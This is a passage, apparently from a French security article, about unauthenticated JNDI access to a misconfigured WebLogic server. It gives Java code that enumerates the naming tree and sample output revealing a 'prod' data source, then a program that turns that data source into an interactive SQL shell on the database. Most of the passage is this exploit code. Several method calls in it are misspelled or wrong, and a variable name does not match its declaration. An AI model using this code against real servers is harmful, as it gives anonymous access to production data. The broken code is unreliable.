    NamingEnumeration<NameClassPair> list = ctx.list("");
    while(objects.hasMore()){
        NameClassPair curObj = objects.next();
        System.out.println("[*] Element: "+ curObj.getName()+
            " - Type: "+curObj.getClassName());
    }
  }

  Sur notre domaine d'exemple, nous obtenons la sortie suivante:
    [*] Element: weblogic - Type: weblogic.corba.j2ee.naming.ContextImpl
    [*] Element: __WL_GlobalJavaApp - Type: weblogic.corba.j2ee.naming.ContextImpl
    [*] Element: _WL_internal_[...] - Type: weblogic.corba.j2ee.naming.ContextImpl
    [*] Element: ejb - Type: weblogic.corba.j2ee.naming.ContextImpl
    [*] Element: javax - Type: weblogic.corba.j2ee.naming.ContextImpl
    [*] Element: java:global - Type: weblogic.corba.j2ee.naming.ContextImpl
    [*] Element: mejbmejb_jarMejb_EO - Type: org.omg.stub.javax.management.j2ee._Management_Stub
    [*] Element: prod - Type: weblogic.jdbc.common.internal._RemoteDataSource_Stub

 Parmi les résultats obtenus, nous observons la présence d'un objet dénommé
 "prod" de type _RemoteDataSource_Stub. Il s'agit d'une connexion à une base de
 données qui a été initialisée par le serveur de connexion. Pour l'attaquant,
 seule cette information est nécessaire pour être exploitable.

 Maintenant que nous avons trouvé un objet qui nous intéressait et que nous
 connaissons son type (objet en relation avec les bases de données), nous
 allons utiliser celui-ci afin d'avoir à notre disposition un shell SQL grâce
 au code suivant :

    package jndi;
     [....]
     class JNDI{
      public static void main(String[] args) throws Exception{
        Hashtable<String, String> h = new Hashtable<String, String>();
        Console shell = System.console();
        String sql_query;
        h.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
        h.put(Context.PROVIDER_URL, "t3://"+args[0]+":"+args[1]);
        InitialContext ctx = new InitialContext(h);
        DataSource datasource = (DataSource)ctx.lookup("prod");
        Statement state = datasource.getConnection().creatNeStatement();
        System.out.println("SQL Shell");
        do{
            sql_query = shell.readline();
            ResultSet res = state.executeQuery(sql_query);
            int columns = res.getMetaData().getColumnCount();
            while(res.next()){
                String result = "[*] ";
                for(int i = 1;i <= columns; i++){
                    result += res.getObject(i);
                    result += " | ";
                }
                System.out.println(result);
            }
        }while(sql_query.index("quit") <0);
      }
     }


 Grâce à la mauvaise configuration du serveur, il est possible pour un
 utilisateur anonyme d'obtenir un très grand nombre d'informations. Dans notre
 exemple nous avons choisi les connexions aux bases de données, mais le même
 type d'attaque peut être réalisé sur l'ensemble des objets accessibles (LDAP,
 flux JMS, etc...).



Plus d'informations sur la liste de diffusion newsletter